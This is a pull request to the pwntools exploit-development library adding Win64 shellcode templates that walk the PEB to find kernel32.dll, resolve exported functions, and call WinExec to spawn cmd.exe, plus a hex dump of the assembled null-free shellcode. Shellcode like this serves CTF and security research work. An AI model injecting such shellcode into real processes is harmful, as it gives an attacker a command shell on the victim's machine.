### PR TITLE
Add basic shellcode for Win64 to shellcraft

### DIFF
--- a/docs/source/shellcraft/amd64.rst
+++ b/docs/source/shellcraft/amd64.rst
@@ -17,3 +17,9 @@
 
 .. automodule:: pwnlib.shellcraft.amd64.linux
    :members:
+
+:mod:`pwnlib.shellcraft.amd64.windows`
+---------------------------------------
+
+.. automodule:: pwnlib.shellcraft.amd64.windows
+   :members:

--- a/pwnlib/shellcraft/templates/amd64/windows/__doc__
+++ b/pwnlib/shellcraft/templates/amd64/windows/__doc__
@@ -1,0 +1,1 @@
+Shellcraft module containing Intel x86_64 shellcodes for Windows.

--- a/pwnlib/shellcraft/templates/amd64/windows/cmd.asm
+++ b/pwnlib/shellcraft/templates/amd64/windows/cmd.asm
@@ -1,0 +1,9 @@
+<%
+    from pwnlib.shellcraft import amd64
+%>
+<%docstring>Execute cmd.exe and keep the parent process
+in an infinite loop.
+</%docstring>
+
+    ${amd64.windows.winexec(b'cmd.exe')}
+    ${amd64.infloop()}

--- a/pwnlib/shellcraft/templates/amd64/windows/getexport.asm
+++ b/pwnlib/shellcraft/templates/amd64/windows/getexport.asm
@@ -1,0 +1,53 @@
+<%
+    from pwnlib.shellcraft import amd64, pretty
+    from pwnlib.util.packing import u64, _need_bytes
+%>
+<%docstring>Find the address of an exported function in a dll
+by manually iterating through the PE export table.
+
+Args:
+    function_name (str): The name of the function to find.
+    dll(str): The name of the DLL to find the function in.
+    dest (str): The register to load the function address into.
+</%docstring>
+<%page args="function_name,dll='kernel32.dll',dest='rax'"/>
+<%
+function_name = _need_bytes(function_name)
+dll = _need_bytes(dll)
+if len(function_name) > 8:
+    raise ValueError('function_name must be <= 8 bytes')
+assert dll == b'kernel32.dll'
+%>
+    ${amd64.windows.kernel32base('rbx')} /* rbx = kernel32.dll PE base */
+    mov r8d, [rbx + 0x3c]
+    mov rdx, r8
+    add rdx, rbx
+    mov r8d, [rdx + 0x88]
+    add r8, rbx /* r8 = export table */
+    mov esi, [r8 + 0x20]
+    add rsi, rbx /* rsi = names table */
+    xor rcx, rcx
+% if len(function_name) <= 8:
+    mov r9, ${pretty(u64(function_name.ljust(8, b'\x00')))}
+% else:
+    ${amd64.pushstr(function_name)}
+    mov r9, rsp
+% endif
+
+    /* Loop through the names table */
+    FindFunction:
+        inc rcx
+        mov eax, [rsi + rcx * 4]
+        add rax, rbx
+        ## TODO: implement strcmp properly for function names > 8 bytes
+        cmp qword ptr [rax], r9
+        jnz FindFunction
+
+    mov esi, [r8 + 0x24]
+    add rsi, rbx /* rsi = ordinals table */
+    mov cx, [rsi + rcx * 2]
+    mov esi, [r8 + 0x1c]
+    add rsi, rbx /* rsi = address table */
+    mov eax, [rsi + rcx * 4]
+    add rax, rbx /* rax = function address */
+    mov ${dest}, rax

--- a/pwnlib/shellcraft/templates/amd64/windows/getexport.asm
+++ b/pwnlib/shellcraft/templates/amd64/windows/getexport.asm
@@ -22,7 +22,9 @@ assert dll == b'kernel32.dll'
     mov r8d, [rbx + 0x3c]
     mov rdx, r8
     add rdx, rbx
-    mov r8d, [rdx + 0x88]
+    ${amd64.mov('r9', 0x88)}
+    add rdx, r9
+    mov r8d, [rdx]
     add r8, rbx /* r8 = export table */
     mov esi, [r8 + 0x20]
     add rsi, rbx /* rsi = names table */

--- a/pwnlib/shellcraft/templates/amd64/windows/getprocaddress.asm
+++ b/pwnlib/shellcraft/templates/amd64/windows/getprocaddress.asm
@@ -1,0 +1,28 @@
+<%
+    from pwnlib.shellcraft import amd64, pretty
+    from pwnlib.util.packing import _need_bytes
+    from pwnlib.util.misc import align
+%>
+<%docstring>Find the address of an exported function
+by calling kernel32::GetProcAddress.
+
+Args:
+    function_name(str): The name of the function to find.
+    dll(str): The name of the DLL to find the function in.
+    dest (str): The register to load the function address into.
+</%docstring>
+<%page args="function_name,dll='kernel32.dll',dest='rax'"/>
+<%
+function_name = _need_bytes(function_name)
+dll = _need_bytes(dll)
+assert dll == b'kernel32.dll'
+%>
+
+    ${amd64.windows.getexport(b'GetProcA', b'kernel32.dll', dest='rdi')}
+    ${amd64.pushstr(function_name)}
+    mov rdx, rsp
+    ${amd64.windows.kernel32base(dest='rcx')}
+    sub rsp, 0x30
+    call rdi
+    add rsp, ${pretty(0x30+align(8, len(function_name)))}
+    mov ${dest}, rax

--- a/pwnlib/shellcraft/templates/amd64/windows/kernel32base.asm
+++ b/pwnlib/shellcraft/templates/amd64/windows/kernel32base.asm
@@ -1,0 +1,18 @@
+<% from pwnlib.shellcraft import amd64 %>
+<%docstring>Find the base address of kernel32.dll in memory.
+
+Args:
+    dest (str): The register to load the kernel32.dll base address into.
+</%docstring>
+<%page args="dest='rax'"/>
+## The loaded list of modules always starts with
+## 1. the executable itself
+## 2. ntdll.dll
+## 3. kernel32.dll
+    ${amd64.windows.peb(dest)}
+    mov ${dest}, [${dest} + 0x18] /* PEB->Ldr */
+    mov rsi, [${dest} + 0x20] /* PEB->Ldr.InMemOrder LIST_ENTRY */
+    lodsq
+    xchg rax, rsi
+    lodsq
+    mov ${dest}, [rax + 0x20] /* LDR_DATA_TABLE_ENTRY->DllBase */

--- a/pwnlib/shellcraft/templates/amd64/windows/ntdllbase.asm
+++ b/pwnlib/shellcraft/templates/amd64/windows/ntdllbase.asm
@@ -1,0 +1,16 @@
+<% from pwnlib.shellcraft import amd64 %>
+<%docstring>Find the base address of ntdll.dll in memory.
+
+Args:
+    dest (str): The register to load the ntdll.dll base address into.
+</%docstring>
+<%page args="dest='rax'"/>
+## The loaded list of modules always starts with:
+## 1. the executable itself
+## 2. ntdll.dll
+## 3. kernel32.dll
+    ${amd64.windows.peb(dest)}
+    mov ${dest}, [${dest} + 0x18] /* PEB->Ldr */
+    mov rsi, [${dest} + 0x20] /* PEB->Ldr.InMemOrder LIST_ENTRY */
+    lodsq
+    mov ${dest}, [rax + 0x20] /* LDR_DATA_TABLE_ENTRY->DllBase */

--- a/pwnlib/shellcraft/templates/amd64/windows/peb.asm
+++ b/pwnlib/shellcraft/templates/amd64/windows/peb.asm
@@ -1,0 +1,8 @@
+<% from pwnlib.shellcraft import amd64 %>
+<%docstring>Loads the Process Environment Block (PEB) into the target register.
+
+Args:
+    dest (str): The register to load the PEB into.
+</%docstring>
+<%page args="dest='rax'"/>
+    ${amd64.windows.teb(dest, 0x60)}

--- a/pwnlib/shellcraft/templates/amd64/windows/teb.asm
+++ b/pwnlib/shellcraft/templates/amd64/windows/teb.asm
@@ -1,0 +1,21 @@
+<%
+  from pwnlib.log import getLogger
+  from pwnlib.shellcraft import pretty
+  from pwnlib.shellcraft.registers import get_register, is_register
+  log = getLogger('pwnlib.shellcraft.amd64.teb')
+%>
+<%page args="dest='rax', offset=0"/>
+<%docstring>Loads the Thread Environment Block (TEB) into the target register.
+
+Args:
+    dest (str): The register to load the TEB into.
+    offset (int): The offset from the TEB to load.
+</%docstring>
+<%
+if not is_register(dest):
+    log.error('%r is not a register' % dest)
+
+dest = get_register(dest)
+%>
+    xor esi, esi
+    mov ${dest}, qword ptr gs:[rsi+${pretty(offset)}]

--- a/pwnlib/shellcraft/templates/amd64/windows/winexec.asm
+++ b/pwnlib/shellcraft/templates/amd64/windows/winexec.asm
@@ -1,0 +1,21 @@
+<%
+    from pwnlib.shellcraft import amd64, pretty
+    from pwnlib.util.packing import _need_bytes
+    from pwnlib.util.misc import align
+%>
+<%docstring>Execute a program using WinExec.
+
+Args:
+    cmd (str): The program to execute.
+</%docstring>
+<%page args="cmd"/>
+<%
+cmd = _need_bytes(cmd)
+%>
+
+    ${amd64.windows.getprocaddress(b'WinExec', b'kernel32.dll', 'rsi')}
+    ${amd64.pushstr(cmd)}
+    mov rcx, rsp
+    sub rsp, 0x30
+    call rsi
+    add rsp, ${pretty(0x30+align(8, len(cmd)))}


### PR DESCRIPTION
This adds basic WinExec("cmd.exe") Win64 shellcode generation to shellcraft. The generated shellcode does not contain null-bytes.

I've tried to split it up into smaller reusable chunks. Used it with some windows pwn and it worked for me.

We could try to add tests using wine, but since windows support is more of an addon in pwntools I didn't go for it yet.

```
$ shellcraft amd64.windows.cmd
[!] Could not find system include headers for amd64-windows
31f665488b5e60488b5b18488b732048ad489648ad488b5820448b433c4c89c24801da4531c941b1884c01ca448b024901d8418b70204801de4831c949b947657450726f634148ffc18b048e4801d84c390875f2418b70244801de668b0c4e418b701c4801de8b048e4801d84889c748b801010101010101015048b856686f4479646201483104244889e231f665488b4e60488b4918488b712048ad489648ad488b48204883ec30ffd74883c4384889c648b801010101010101015048b8626c652f64796401483104244889e14883ec30ffd64883c438ebfe
```